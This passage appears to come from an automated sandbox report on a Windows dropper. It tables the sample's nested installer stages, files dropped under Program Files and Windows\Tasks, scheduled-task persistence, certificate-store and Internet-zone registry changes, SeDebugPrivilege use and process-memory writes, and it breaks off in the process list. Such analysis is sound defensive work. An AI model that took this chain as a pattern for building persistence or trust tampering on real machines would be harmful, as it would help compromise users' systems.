File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A
File created C:\Program Files (x86)\SvbbHukzU\FSnEmZP.xml C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A
File created C:\Program Files (x86)\SvbbHukzU\hIJhvE.dll C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A
File created C:\Program Files (x86)\dVbwgRbTSJJLORWiduR\afuTILY.xml C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A
File created C:\Program Files (x86)\XYDCXZXPsTrrC\qNmZqVV.dll C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A
File created C:\Program Files (x86)\nolBHjueEzUn\siwLxmt.dll C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\bLgAHCKDimrPMlxXg.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\bWLKrWFeqGsUKIPSIT.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\biFxKMwOTZzXEKwTU.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\HvGgydgoxkjNzSQ.job C:\Windows\SysWOW64\schtasks.exe N/A

Enumerates physical storage devices

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Users\Admin\AppData\Local\Temp\7zS7FF.tmp\Install.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Users\Admin\AppData\Local\Temp\7zS7FF.tmp\Install.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Windows\SysWOW64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Windows\SysWOW64\rundll32.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{5d2b4a7c-0000-0000-0000-d01200000000} C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{5d2b4a7c-0000-0000-0000-d01200000000}\MaxCapacity = "15140" C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{5d2b4a7c-0000-0000-0000-d01200000000}\NukeOnDelete = "0" C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" C:\Windows\SysWOW64\rundll32.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A
N/A N/A C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A
N/A N/A C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A
N/A N/A C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A
N/A N/A C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A
N/A N/A C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A
N/A N/A C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A
N/A N/A C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A
N/A N/A C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A
N/A N/A C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A
N/A N/A C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A
N/A N/A C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A
N/A N/A C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A
N/A N/A C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A
N/A N/A C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A
N/A N/A C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A
N/A N/A C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A
N/A N/A C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A
N/A N/A C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A
N/A N/A C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A
N/A N/A C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A
N/A N/A C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A
N/A N/A C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A
N/A N/A C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A
N/A N/A C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A
N/A N/A C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A
N/A N/A C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A
N/A N/A C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A
N/A N/A C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A
N/A N/A C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A
N/A N/A C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A
N/A N/A C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4772 wrote to memory of 4048 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Users\Admin\AppData\Local\Temp\7zSFDFC.tmp\Install.exe
PID 4772 wrote to memory of 4048 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Users\Admin\AppData\Local\Temp\7zSFDFC.tmp\Install.exe
PID 4772 wrote to memory of 4048 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Users\Admin\AppData\Local\Temp\7zSFDFC.tmp\Install.exe
PID 4048 wrote to memory of 2820 N/A C:\Users\Admin\AppData\Local\Temp\7zSFDFC.tmp\Install.exe C:\Users\Admin\AppData\Local\Temp\7zS7FF.tmp\Install.exe
PID 4048 wrote to memory of 2820 N/A C:\Users\Admin\AppData\Local\Temp\7zSFDFC.tmp\Install.exe C:\Users\Admin\AppData\Local\Temp\7zS7FF.tmp\Install.exe
PID 4048 wrote to memory of 2820 N/A C:\Users\Admin\AppData\Local\Temp\7zSFDFC.tmp\Install.exe C:\Users\Admin\AppData\Local\Temp\7zS7FF.tmp\Install.exe
PID 2820 wrote to memory of 1652 N/A C:\Users\Admin\AppData\Local\Temp\7zS7FF.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 2820 wrote to memory of 1652 N/A C:\Users\Admin\AppData\Local\Temp\7zS7FF.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 2820 wrote to memory of 1652 N/A C:\Users\Admin\AppData\Local\Temp\7zS7FF.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 2820 wrote to memory of 3516 N/A C:\Users\Admin\AppData\Local\Temp\7zS7FF.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 2820 wrote to memory of 3516 N/A C:\Users\Admin\AppData\Local\Temp\7zS7FF.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 2820 wrote to memory of 3516 N/A C:\Users\Admin\AppData\Local\Temp\7zS7FF.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 1652 wrote to memory of 1780 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 1652 wrote to memory of 1780 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 1652 wrote to memory of 1780 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 3516 wrote to memory of 4368 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 3516 wrote to memory of 4368 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 3516 wrote to memory of 4368 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 1780 wrote to memory of 2896 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 1780 wrote to memory of 2896 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 1780 wrote to memory of 2896 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 4368 wrote to memory of 2248 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 4368 wrote to memory of 2248 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 4368 wrote to memory of 2248 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 1780 wrote to memory of 4520 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 1780 wrote to memory of 4520 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 1780 wrote to memory of 4520 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 4368 wrote to memory of 2128 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 4368 wrote to memory of 2128 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 4368 wrote to memory of 2128 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2820 wrote to memory of 1928 N/A C:\Users\Admin\AppData\Local\Temp\7zS7FF.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 2820 wrote to memory of 1928 N/A C:\Users\Admin\AppData\Local\Temp\7zS7FF.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 2820 wrote to memory of 1928 N/A C:\Users\Admin\AppData\Local\Temp\7zS7FF.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 2820 wrote to memory of 204 N/A C:\Users\Admin\AppData\Local\Temp\7zS7FF.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 2820 wrote to memory of 204 N/A C:\Users\Admin\AppData\Local\Temp\7zS7FF.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 2820 wrote to memory of 204 N/A C:\Users\Admin\AppData\Local\Temp\7zS7FF.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 404 wrote to memory of 3500 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\system32\gpupdate.exe
PID 404 wrote to memory of 3500 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\system32\gpupdate.exe
PID 2820 wrote to memory of 2356 N/A C:\Users\Admin\AppData\Local\Temp\7zS7FF.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 2820 wrote to memory of 2356 N/A C:\Users\Admin\AppData\Local\Temp\7zS7FF.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 2820 wrote to memory of 2356 N/A C:\Users\Admin\AppData\Local\Temp\7zS7FF.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 2820 wrote to memory of 4452 N/A C:\Users\Admin\AppData\Local\Temp\7zS7FF.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 2820 wrote to memory of 4452 N/A C:\Users\Admin\AppData\Local\Temp\7zS7FF.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 2820 wrote to memory of 4452 N/A C:\Users\Admin\AppData\Local\Temp\7zS7FF.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 1784 wrote to memory of 3152 N/A C:\Users\Admin\AppData\Local\Temp\aFevMsDBlqIRbqTyh\IZVHwqqvKwOqTrb\rjhsLhD.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1784 wrote to memory of 3152 N/A C:\Users\Admin\AppData\Local\Temp\aFevMsDBlqIRbqTyh\IZVHwqqvKwOqTrb\rjhsLhD.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1784 wrote to memory of 3152 N/A C:\Users\Admin\AppData\Local\Temp\aFevMsDBlqIRbqTyh\IZVHwqqvKwOqTrb\rjhsLhD.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3152 wrote to memory of 5060 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 3152 wrote to memory of 5060 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 3152 wrote to memory of 5060 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 5060 wrote to memory of 4320 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 5060 wrote to memory of 4320 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 5060 wrote to memory of 4320 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3152 wrote to memory of 2700 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3152 wrote to memory of 2700 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3152 wrote to memory of 2700 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3152 wrote to memory of 4976 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3152 wrote to memory of 4976 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3152 wrote to memory of 4976 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3152 wrote to memory of 4688 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3152 wrote to memory of 4688 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3152 wrote to memory of 4688 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3152 wrote to memory of 4692 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3152 wrote to memory of 4692 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe

Processes

C:\Users\Admin\AppData\Local\Temp\file.exe

"C:\Users\Admin\AppData\Local\Temp\file.exe"

C:\Users\Admin\AppData\Local\Temp\7zSFDFC.tmp\Install.exe

.\Install.exe

C:\Users\Admin\AppData\Local\Temp\7zS7FF.tmp\Install.exe

.\Install.exe /S /site_id "525403"

C:\Windows\SysWOW64\forfiles.exe

